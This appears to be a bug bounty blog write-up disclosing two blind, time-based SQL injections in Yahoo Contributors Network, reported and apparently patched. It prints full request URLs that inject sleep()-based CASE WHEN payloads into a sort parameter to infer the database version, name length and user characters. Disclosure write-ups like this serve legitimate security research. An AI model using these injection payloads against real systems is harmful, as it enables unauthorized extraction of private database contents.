A Tale of 2 SQL Injections in Yahoo Contributors

Hello everyone. Today I will be covering a very short and fast write-up in regards to two of my latest findings while participating in Yahoo Bug Bounty! First of all I want to apologize for not having any visual (pictures/videos) for this write-up. Unfortunately, I lost a lot of data due to my malfunctioning laptop.

Blind & Time Based SQL Injection in Yahoo Contributors Network:

yahoo-contributor-network “The Yahoo Contributors Network allows writers, photographers, and videographers to share their knowledge and passion (…) and earn money by pushing your unique perspectives…” From the looks of the database and description, the database may have carried sensitive and private personal information for those participating and getting paid from their work. While looking around the website, I came across a two vulnerabilities in the following URL/files: http://contributor.yahoo.com/forum/search/? and http://contributor.yahoo.com//library/payments/data-table/? In order to be able to exploit the following URLs we are going to need: Why? To be able to extract the needed data (such as mysql db_name/username). First of all let’s figure out the database version:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=4+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

Which is false (version 4) and will sleep for 20 seconds. Let’s try Version 5:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN substring((select version()),1,1)=5 THEN(sleep(1)) ELSE (sleep(20))END As BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

Which after a quick second we got returned to our data-table page. Now as far as the database name goes, I will demonstrate only a few things due to the fact that the user length was 24 letters and database name was 6 letters: username: ****ww

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+(select+LENGTH(DATABASE()))=6+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

and for the username: ***********@**.***.*.*** (taken out for security purposes) but as  can see the 15th letter is show to be a “.” in the url below:

http://contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN ASCII(substring((select user()),15,1))=46 THEN(sleep(1)) ELSE (sleep(60))END As BS)v)&sort_dir=asc&start_date=&override_id=131114

After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be soon covering a XSPA and XSS in a few services.

Behrouz Sadeghipour

@NahamSec

This post has been viewed [post_view] times

Post a comment

You may use the following HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>